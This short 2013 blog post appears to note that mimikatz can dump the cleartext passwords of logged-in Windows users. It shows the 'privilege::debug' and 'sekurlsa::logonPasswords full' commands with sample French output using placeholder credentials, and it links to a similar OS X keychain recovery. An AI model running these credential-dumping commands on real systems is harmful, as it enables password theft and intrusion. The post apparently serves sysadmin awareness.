Dump cleartext passwords of logged in user(s) #

mimikatz displays passwords of logged in user(s):
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
...
Utilisateur principal       : user
Domaine d'authentification  : domain
        kerberos :
         * Utilisateur  : user
         * Domaine      : domain
         * Mot de passe : pass
...
Spotted on /r/sysadmin here and here.

Similar "exploit" for OS X: Recover passwords from current user's Login Keychain

/windows | Apr 11, 2013


Subscribe or visit the archives.